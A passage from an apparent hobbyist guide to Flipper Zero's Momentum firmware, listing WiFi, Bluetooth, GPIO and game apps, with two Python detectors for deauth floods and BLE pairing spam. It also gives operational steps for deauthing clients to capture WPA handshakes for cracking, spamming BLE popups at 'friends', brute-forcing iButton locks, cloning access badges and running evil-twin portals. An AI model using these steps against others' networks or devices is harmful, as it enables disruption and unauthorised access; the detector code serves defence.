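        out += struct.pack("<IIII", int(ts), int((ts % 1) * 1e6), len(frame), len(frame)) + frame
    return out

def _deauth(src: bytes, dst: bytes = b"\xff" * 6, reason=7) -> bytes:
    # FC 0xC000 = management/deauth; duration 0; addr1=dst, addr2=src, addr3=bssid; seq 0; reason
    return b"\xc0\x00" + b"\x00\x00" + dst + src + src + b"\x00\x00" + struct.pack("<H", reason)

SAMPLE_PCAP = _pcap(
    [(100.0 + i * 0.02, _deauth(b"\x02\x00\x00\x00\x00\x01")) for i in range(30)]  # 30 in 0.6 s
    + [(101.5, _deauth(b"\x02\x00\x00\x00\x00\x02"))]                               # a one-off
)

if __name__ == "__main__":
    print(detect_deauth_flood(SAMPLE_PCAP))
```

Reason code 7 ("class 3 frame received from nonassociated station") is the value most flooding tools reuse, and a transmitter address that never appears in any beacon is a second tell; both are cheap extra checks on the same parsed fields.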
Capture WPA Handshakes
# Start raw capture + deauth to force reconnection
scanap
stopscan
select -a 3
sniffraw
# In another session or after capture:
attack -t deauth
# Wait for client to reconnect (handshake captured)
stopscan
# Transfer PCAP from SD card → crack with hashcat/aircrack-ng
👻 Ghost ESP — Alternative WiFi Suite
Advanced🐬🐬🐬🐬

Ghost ESP is a Momentum-included alternative to Marauder. Built for ESP32, it provides a similar feature set with some differences:

  • WiFi scanning — AP and station discovery
  • Deauth attacks — kick clients off networks
  • Beacon spam — flood with fake SSIDs
  • Captive portal — evil portal functionality
  • Packet capture — PCAP output
  • BLE attacks — BLE spam and scanning (if using ESP32 with BLE support)
  • Active development — newer codebase, some unique features

Available under Momentum's GPIO → Ghost ESP app.

📡 Bluetooth

Flipper Zero's built-in BLE 5.0 radio enables BLE spam attacks, FindMy tracking, Bluetooth HID devices, and more. Momentum unlocks the full potential.

📱 BLE Spam — Fake Device Popups
Beginner🐬🐬🐬🐬🐬

Generates BLE advertisements that trigger pop-up notifications on nearby phones and computers.

Target | Effect | Range | Notes
🍎 Apple | Fake AirPods/AirTag/Apple TV pairing popups | ~10m | Works on iOS 17+. Shows "AirPods Pro found nearby" etc.
📱 Samsung | Fake Galaxy Buds pairing notifications | ~10m | Shows "Galaxy Buds Pro found nearby" on Samsung phones
🔵 Google | Fake Pixel Buds / Fast Pair popups | ~10m | Triggers Google Fast Pair on Android devices
🪟 Windows SwiftPair | Bluetooth pairing notification flood | ~10m | Spams Windows PCs with pairing requests
🍏 Sour Apple | iOS device crash (older iOS only) | ~10m | Exploited a bug in iOS < 17.2 — causes settings crashes. Patched.
Usage
  • Navigate to Bluetooth → BLE Spam (Momentum menu)
  • Select target platform
  • Choose device type to spoof (e.g., AirPods Pro, Galaxy Buds, etc.)
  • Start — Flipper begins broadcasting fake BLE advertisements
  • Nearby devices within ~10m see pairing popups
Note
BLE Spam is mostly annoying but harmless. Victims can dismiss notifications. The Sour Apple crash attack has been patched in iOS 17.2+. This is a demonstration of BLE protocol weaknesses.
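To go with the target table above, here is the defender's side as an added Python example (not code from this page or from Momentum): a scanner-side filter that recognises the two advertisement shapes behind the Apple and Google popups, Apple manufacturer-specific data (Bluetooth SIG company ID 0x004C) carrying Continuity message type 0x07 (proximity pairing) and Google Fast Pair service data under the 16-bit service UUID 0xFE2C, and raises an alert when a burst of such adverts arrives from many distinct addresses or payloads inside a short window. That spread is what separates a spammer rotating fake devices from one real pair of earbuds, which repeats one payload from one address. The addresses and payload filler in the sample functions are constructed; the 0x07 type value comes from public reverse-engineering of Continuity and is treated here as an assumption.

```python
from __future__ import annotations
import struct
from collections import deque

AD_MANUFACTURER_DATA = 0xFF     # AD type: manufacturer specific data
AD_SERVICE_DATA_16 = 0x16       # AD type: service data with a 16-bit UUID
APPLE_COMPANY_ID = 0x004C       # Bluetooth SIG company identifier for Apple
APPLE_PROXIMITY_PAIRING = 0x07  # Continuity message type behind the AirPods popup (assumed)
FAST_PAIR_UUID = 0xFE2C         # Google Fast Pair service UUID


def parse_ad_structures(payload: bytes) -> list[tuple[int, bytes]]:
    """Split an advertising payload into (ad_type, data) pairs.

    Each AD structure is <length><type><data>, where length counts the type
    byte. Parsing stops at a zero length or at a structure that overruns the
    payload, so a truncated or malformed advert yields only what was parsed.
    """
    out, i = [], 0
    while i < len(payload):
        length = payload[i]
        if length == 0 or i + 1 + length > len(payload):
            break
        out.append((payload[i + 1], payload[i + 2:i + 1 + length]))
        i += 1 + length
    return out


def classify_pairing_advert(payload: bytes) -> str | None:
    """Return the popup family an advert would trigger, or None if it is ordinary."""
    for ad_type, data in parse_ad_structures(payload):
        if ad_type == AD_MANUFACTURER_DATA and len(data) >= 3:
            company = struct.unpack_from("<H", data)[0]
            if company == APPLE_COMPANY_ID and data[2] == APPLE_PROXIMITY_PAIRING:
                return "apple-proximity-pairing"
        elif ad_type == AD_SERVICE_DATA_16 and len(data) >= 2:
            if struct.unpack_from("<H", data)[0] == FAST_PAIR_UUID:
                return "google-fast-pair"
    return None


def detect_pairing_spam(adverts, window_s: float = 10.0, min_adverts: int = 20, min_distinct: int = 5) -> list[dict]:
    """adverts: iterable of (timestamp_s, address, payload) in time order.

    Alert when a sliding window holds at least `min_adverts` pairing-style
    adverts spread over at least `min_distinct` distinct (address, payload)
    combinations. One accessory never reaches the second condition.
    """
    window = deque()
    alerts = []
    in_burst = False
    for ts, addr, payload in adverts:
        kind = classify_pairing_advert(payload)
        if kind is None:
            continue
        window.append((ts, addr, kind, bytes(payload)))
        while window and ts - window[0][0] > window_s:
            window.popleft()
        distinct = {(a, p) for _, a, _, p in window}
        if len(window) >= min_adverts and len(distinct) >= min_distinct:
            if not in_burst:
                in_burst = True
                alerts.append({"start": window[0][0], "end": ts, "count": len(window),
                               "distinct_sources": len(distinct),
                               "kinds": sorted({k for _, _, k, _ in window})})
            else:
                alerts[-1].update(end=ts, count=len(window), distinct_sources=len(distinct))
        else:
            in_burst = False
    return alerts


def _ad(ad_type: int, data: bytes) -> bytes:
    return bytes([len(data) + 1, ad_type]) + data


def apple_pairing_payload(model: int) -> bytes:
    """Constructed advert: flags + Apple manufacturer data of type 0x07.
    Everything after the model id is zero filler; only the type byte matters here."""
    mfr = struct.pack("<H", APPLE_COMPANY_ID) + bytes([APPLE_PROXIMITY_PAIRING]) + struct.pack(">H", model) + b"\x00" * 8
    return _ad(0x01, b"\x1a") + _ad(AD_MANUFACTURER_DATA, mfr)


def fast_pair_payload(model_id: bytes) -> bytes:
    """Constructed advert: flags + Fast Pair service data with a 3-byte model id."""
    return _ad(0x01, b"\x06") + _ad(AD_SERVICE_DATA_16, struct.pack("<H", FAST_PAIR_UUID) + model_id)


def sample_real_case() -> list:
    """One accessory: one address, one payload, 60 adverts over 6 s (constructed)."""
    return [(i * 0.1, "5c:00:00:00:00:01", apple_pairing_payload(0x0E20)) for i in range(60)]


def sample_spam_burst() -> list:
    """30 adverts in 3 s, each from a fresh address, rotating models and families (constructed)."""
    adverts = []
    for i in range(30):
        addr = f"c2:00:00:00:{i // 256:02x}:{i % 256:02x}"
        payload = apple_pairing_payload(0x0E20 + i % 4) if i % 2 == 0 else fast_pair_payload(bytes([0x12, 0x34, i]))
        adverts.append((i * 0.1, addr, payload))
    return adverts


if __name__ == "__main__":
    print("real accessory:", detect_pairing_spam(sample_real_case()))
    print("spam burst:", detect_pairing_spam(sample_spam_burst()))
```

Feeding the detector from a live scanner only requires mapping each received advertising report to (timestamp, address, raw payload); the thresholds are deliberately parameters, since a busy electronics store will legitimately show more distinct accessories than a quiet office.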
📍 FindMy Flipper — Track via Apple's Network
Beginner🐬🐬🐬🐬🐬

Makes your Flipper Zero trackable through Apple's FindMy network — just like an AirTag. Uses the massive network of iPhones worldwide to relay your Flipper's location.

How It Works
  • Auto-enabled on Momentum firmware — starts broadcasting at boot
  • Flipper broadcasts BLE advertisements mimicking an AirTag
  • Nearby iPhones pick up the signal and anonymously relay location to Apple
  • You see your Flipper's location in the FindMy app on your iPhone/Mac
  • Works even when Flipper is powered off (if battery has charge for BLE)
Setup
  • On first Momentum boot, FindMy is configured automatically
  • Open FindMy app on iPhone → Items → your Flipper appears as an AirTag-like device
  • Configure in Momentum App → BLE → FindMy
Tip
This is incredibly useful if you lose your Flipper. As long as any iPhone passes within BLE range (~30m), the location updates. Works in cities, malls, airports — anywhere people have iPhones.
⌨️ BT HID — Bluetooth Keyboard & Mouse
Beginner🐬🐬🐬

Use your Flipper as a Bluetooth keyboard, mouse, or media controller for any device.

  • Bluetooth Remote — control media playback, presentations, volume
  • Bad Keyboard — wireless BadUSB (DuckyScript over BLE)
  • USB Keyboard/Mouse — when connected via USB, Flipper acts as a HID device

Pair with your phone, tablet, or computer like any Bluetooth keyboard. Useful for presentations, remote control, or as an accessibility tool.

🔌 GPIO & Expansion Modules

18 GPIO pins at 3.3V for connecting WiFi boards, sensors, displays, and custom hardware. Built-in UART, SPI, I2C, and 1-Wire support.

🔌 Built-in GPIO Features
Intermediate
Feature | Description | Use Case
GPIO Control | Set pins as input/output, read voltage levels | LED control, button reading, sensor interfacing
USB-UART Bridge | Flipper acts as USB-to-serial adapter | Connect to serial consoles, debug embedded devices, ESP32 programming
1-Wire | Dallas 1-Wire protocol interface | iButton emulation, temperature sensors (DS18B20)
I2C Scanner | Scan I2C bus for connected devices | Identify connected I2C sensors, displays, etc.
GPIO Pin Layout
┌──────────────────────────────────┐
│ Flipper Zero GPIO Header (top)   │
├──────────────────────────────────┤
│  1 [3.3V]            [GND] 2     │
│  3 [SWC]              [A7] 4     │
│  5 [SWD]              [A6] 6     │
│  7 [5V]               [A4] 8     │
│  9 [C3]               [B3] 10    │
│ 11 [C1]               [B2] 12    │
│ 13 [C0/TX]            [C5] 14    │
│ 15 [RX/C1]            [C4] 16    │
│ 17 [iButton]         [GND] 18    │
└──────────────────────────────────┘
TX/RX (pins 13-14): UART for WiFi Dev Board / Marauder
5V (pin 7): Power ESP32 boards directly
3.3V (pin 1): Logic level for most sensors
Momentum GPIO Apps
🔍 GPIO Explorer
Visual pin state viewer. See real-time status of all GPIO pins — high/low, input/output mode, voltage levels.
Beginner🐬🐬
📻 KT0803 FM Transmitter
Transmit FM radio using a KT0803L module connected via I2C. Set frequency, volume, and broadcast audio over FM.
Intermediate🐬🐬🐬🐬
🔄 SPI Terminal
Send and receive data over SPI bus. Useful for debugging SPI devices, flash chips, and embedded systems.
Advanced🐬🐬
🔌 FlipTDI
FTDI FT232H interface emulation. USB-to-serial with advanced features like MPSSE for SPI/I2C/JTAG.
Advanced🐬🐬
INA Meter
Read voltage, current, and power from INA2xx series power measurement ICs. Great for profiling power consumption.
Intermediate🐬🐬🐬
👻 Ghost ESP
Alternative WiFi/BLE attack suite for ESP32 boards. Scans, deauth, beacon spam, evil portal, packet capture.
Advanced🐬🐬🐬🐬
🌿 CO2 Logger
Read CO2 levels from an MH-Z19 sensor connected via UART. Displays ppm readings with graph history.
Intermediate🐬🐬🐬
🎮 FlipBoard Suite
Four apps for the FlipBoard accessory: Blinky (LED patterns), Keyboard (custom shortcuts), Signal (GPIO signaling), Simon (memory game).
Beginner🐬🐬🐬
🌐 FlipperHTTP Apps
HTTP-enabled apps via ESP32: FlipMap (maps), FlipTelegram (Telegram client), Free Roam (web browser). Requires WiFi-connected ESP32.
Intermediate🐬🐬🐬
📍 GPS Nearby Files
Find saved files (Sub-GHz captures, NFC dumps, etc.) that were captured near your current GPS coordinates. Requires GPS module.
Intermediate🐬🐬🐬
🗺️ Wardriver
WiFi wardriving with GPS logging. Scans nearby WiFi networks while recording GPS coordinates. Export to Wigle-compatible CSV for mapping.
Advanced🐬🐬🐬🐬
🎮 Games, Tools & Media

Beyond hacking — Flipper Zero runs games, media players, and essential tools. Momentum includes a huge app library.

🎮 Games
👹 Doom
Yes, Doom runs on Flipper Zero. Single-player FPS on a 128×64 screen. D-pad controls, surprisingly playable.
Beginner🐬🐬🐬🐬🐬
🔢 2048
Classic tile-sliding puzzle game. Combine numbers to reach 2048.
Beginner🐬🐬🐬
🐍 Snake
The classic Nokia snake game. Grow the snake, don't hit the walls.
Beginner🐬🐬🐬
🧱 Tetris
Classic block-stacking puzzle. Fits perfectly on the 128×64 screen.
Beginner🐬🐬🐬
🏓 Arkanoid
Break bricks with a bouncing ball. Classic arcade action.
Beginner🐬🐬🐬
🐦 Flappy Bird
Navigate the bird through pipes. Addictive and frustrating as ever.
Beginner🐬🐬🐬
💣 Minesweeper
Classic minesweeper. Flag mines, clear the board.
Beginner🐬🐬
🎨 Color Guess
Guess the RGB color value. Tests your color perception skills.
Beginner🐬🐬
🔧 Tools
⚙️ Momentum App
Central firmware configuration. Manage protocols, extended frequencies, UI themes, RGB backlight, asset packs, passport customization, and all Momentum settings.
Beginner🐬🐬🐬🐬🐬
📊 Frequency Analyzer
Real-time RF frequency detection. Point and press — see what frequency a device transmits on.
Beginner🐬🐬🐬🐬
🎮 Bluetooth Remote
Use Flipper as a Bluetooth remote for presentations, media playback, or cursor control.
Beginner🐬🐬🐬
⌨️ USB Keyboard/Mouse
Flipper as a wired USB keyboard or mouse. Use the d-pad to control cursor or type text.
Beginner🐬🐬
🔑 iButton Fuzzer
Brute-force iButton (1-Wire) intercom keys. Tries random or sequential codes against Dallas, Cyfral, and Metakom locks.
Advanced🐬🐬🐬
🎬 Media
📹 Video Player
Play converted video files on Flipper's 128×64 screen. Supports custom-encoded .bm format.
Beginner🐬🐬🐬
🖼️ Image Viewer
Display images on Flipper's screen. Supports 128×64 BM/BMP monochrome images.
Beginner🐬🐬
🔊 WAV Player
Play WAV audio files through Flipper's speaker. 8-bit, mono, 8-48kHz sample rate. Tiny but functional.
Beginner🐬🐬🐬
🌌 Space Playground
Interactive space-themed screensaver and animation playground.
Beginner🐬🐬
🎨 Customization
🪪 Passport & Identity
Beginner🐬🐬🐬🐬

Customize your Flipper's identity via the Passport feature:

  • Name — custom device name shown on the passport screen
  • Level — increases with usage (read cards, send signals, etc.)
  • Custom backgrounds — Momentum supports custom passport backgrounds
  • Multiple themes — choose from pre-installed passport themes or create your own
🐬 Desktop Animations & Asset Packs
Beginner🐬🐬🐬🐬

Momentum supports 100+ community animation packs that change the idle dolphin animation on the home screen.

  • Download packs from the Momentum community
  • Place in /ext/dolphin/ on SD card
  • Select via Momentum App → Desktop → Animations
  • Themes include: cyberpunk, pixel art, anime, memes, custom characters
🌈 RGB Backlight (Momentum)
Beginner🐬🐬🐬🐬

Momentum enables full RGB control of the screen backlight (stock firmware only supports orange).

  • Momentum App → LED → Backlight
  • Set any RGB color combination
  • Rainbow mode — cycles through colors
  • Different colors for different events (read success = green, error = red)
Note
RGB backlight requires a hardware modification on some Flipper revisions (replacing the stock LED with an RGB LED). Newer revisions and some sellers include the RGB LED pre-installed.
🛡️ Cool Things You Can Do

A showcase of the most interesting projects and demonstrations. These are the "wow factor" moments that make Flipper Zero special.

🏢 Clone Your Building Access Card
Read your MIFARE Classic or HID ProxCard badge, crack the keys with MFKey, and write a perfect clone to a magic card. Never worry about forgetting your badge again.
🐬🐬🐬🐬🐬 Intermediate
📺 Turn Off Any TV in a Restaurant
Use the universal TV remote to power off (or on) any TV within IR range. The power button cycles through hundreds of brand codes until it hits the right one.
🐬🐬🐬🐬🐬 Beginner
🏠 Open Your Garage From Your Phone
Capture your garage door signal, save it to the Flipper, then trigger it remotely via the FlipperLab dashboard. Open your garage from anywhere with internet access.
🐬🐬🐬🐬 Beginner
📡 Map the Radio Spectrum
Use Sub Analyzer and Frequency Analyzer to sweep the radio spectrum. Identify every wireless device in your environment — weather stations, baby monitors, wireless sensors, IoT devices.
🐬🐬🐬🐬 Intermediate
📶 Test Your Home WiFi Security
With the WiFi Dev Board, scan for vulnerabilities: weak passwords (PMKID capture + hashcat), WPS PIN attacks, rogue AP detection, and client isolation testing.
🐬🐬🐬🐬🐬 Advanced
🎭 Create an Evil Twin Network
Set up a fake WiFi portal that mimics a real network. When users connect, they see a login page you control. Demonstrates the danger of public WiFi. For authorized testing only.
🐬🐬🐬🐬🐬 Advanced
📱 Spam BLE Popups at Friends
Trigger fake AirPods/Galaxy Buds pairing popups on nearby phones. Harmless fun — the notifications dismiss easily. Works from 10 meters away.
🐬🐬🐬🐬🐬 Beginner
🚇 Read Transit Card Balance
Use Metroflip to read your transit card and see your balance, recent trips, and card details. Supports 80+ transit systems worldwide.
🐬🐬🐬🐬 Beginner
🎵 Rickroll via Beacon Spam
Use Marauder's beacon spam with the rickroll SSID list. Everyone nearby sees WiFi networks named with lyrics to "Never Gonna Give You Up" 🎶
🐬🐬🐬🐬🐬 Beginner
🤖 Make NFC Body Implants Glow
Use the Cyborg Detector app to generate a continuous NFC field. NFC implants with LEDs (like the xSIID) will glow when held near the Flipper. Cyberpunk vibes.
🐬🐬🐬🐬🐬 Beginner
🗺️ War-Drive Your Neighborhood
Attach a GPS module + WiFi Dev Board and walk/drive around. The Wardriver app logs every WiFi network with its GPS coordinates. Export to Wigle for mapping.
🐬🐬🐬🐬 Intermediate